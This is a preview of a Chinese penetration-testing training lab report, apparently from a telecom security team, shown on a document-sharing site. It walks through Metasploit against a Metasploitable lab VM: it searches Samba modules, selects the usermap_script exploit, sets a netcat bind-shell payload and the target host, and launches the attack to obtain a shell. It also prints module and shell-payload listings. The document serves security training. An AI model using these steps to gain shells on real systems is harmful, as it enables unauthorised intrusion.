渗透测试实验报告 (中国移动安全部).doc

资源描述

《渗透测试实验报告 (中国移动安全部).doc》由会员分享，可在线阅读，更多相关《渗透测试实验报告 (中国移动安全部).doc（34页珍藏版）》请在金锄头文库上搜索。

1、渗透测试培训 3月13日第一天：主要实验总结首先利用struts2漏洞，可以直接执行任意命令，取得主机控制权。实验环境：KALI linux 作为攻击工具；owasp 作为靶机2003 metaspoitable 实现能够成功访问使用metaspliot完成对于靶机samba 服务的攻击，获取shell 权限search samba 查找模块Use multi/samba/usemap_script 选择渗透攻击模块Show payloads 查看与该渗透模块相兼容的攻击载荷Set payload cmd/unix/bind_netcat选择netcat工具在渗透攻击成功后执行shellSho

2、w options 查看需要设置的参数Set RHOST 10.10.10.254 设置主机攻击主机Exploit启动攻击1、首先安装vm虚拟机程序，开启kali，owasp和metaspoitalbe等工具和搭建环境，使得网络可达，网络配置上选择nat模式，地址范围为10.10.10.0/242、开启kali虚机，进入root模式，首先进入msfconsle，修改初始密码为123456msf passwd * exec: passwd 输入新的 UNIX 密码：重新输入新的 UNIX 密码：passwd：已成功更新密码然后寻找samba模块msf search sambaMatching M

3、odules= Name Disclosure Date Rank Description - - - - auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Hea

4、p Overflow auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86) exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86) exploit/linux/

5、samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86) exploit/multi/samba

6、/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow exploit/multi/samba/usermap_script 2007-05-14 excellent Samba username map script Command Execution exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow exploit/osx/samba/trans2open 200

7、3-04-07 great Samba trans2open Overflow (Mac OS X PPC) exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC) exploit/unix/misc/distcc_exec 2002-02-01 excellent Di

8、stCC Daemon Command Execution exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow exploit/windows/license/calicclnt_getconfig 2005-03-02 avera

9、ge Computer Associates License Client GETCONFIG Overflow post/linux/gather/enum_configs normal Linux Gather Configurationsmsf use multi/samba/usermap_script 选择渗透攻击模块msf exploit(usermap_script) show payloads 查看与该渗透模块相兼容的攻击载荷Compatible Payloads= Name Disclosure Date Rank Description - - - - cmd/unix/b

10、ind_awk normal Unix Command Shell, Bind TCP (via AWK) cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd) cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua) cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat) cmd/unix/bind_netcat_gaping normal Unix Command

11、Shell, Bind TCP (via netcat -e) cmd/unix/bind_netcat_gaping_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6 cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6 cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby) cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6 cmd/unix/bind_zsh normal Unix Command Shell, Bind TCP (via Zsh) cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/reverse normal Unix Command Shell, Double Reverse

展开阅读全文

渗透测试 实验报告 (中国移动安全部).doc

最新文档

渗透测试实验报告 (中国移动安全部).doc